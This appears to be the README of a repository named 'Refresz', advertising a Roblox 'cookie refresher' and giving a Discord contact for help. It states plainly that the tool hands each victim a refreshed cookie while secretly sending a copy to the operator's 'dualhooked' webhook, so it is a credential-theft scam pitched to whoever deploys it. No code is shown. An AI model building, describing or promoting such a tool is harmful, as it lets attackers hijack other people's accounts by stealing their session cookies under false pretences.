xxuspv/Refresz/README.md

 everytime someone inputs a roblox cookie on ur cookie refresher it will refresh the roblox cookie of the roblox account and sent the user a new cookie, but this will also sent you a refreshed roblox cookie to ur dualhooked webhook.

 ```

+# Help?
+contact me with deix_du_condido on discord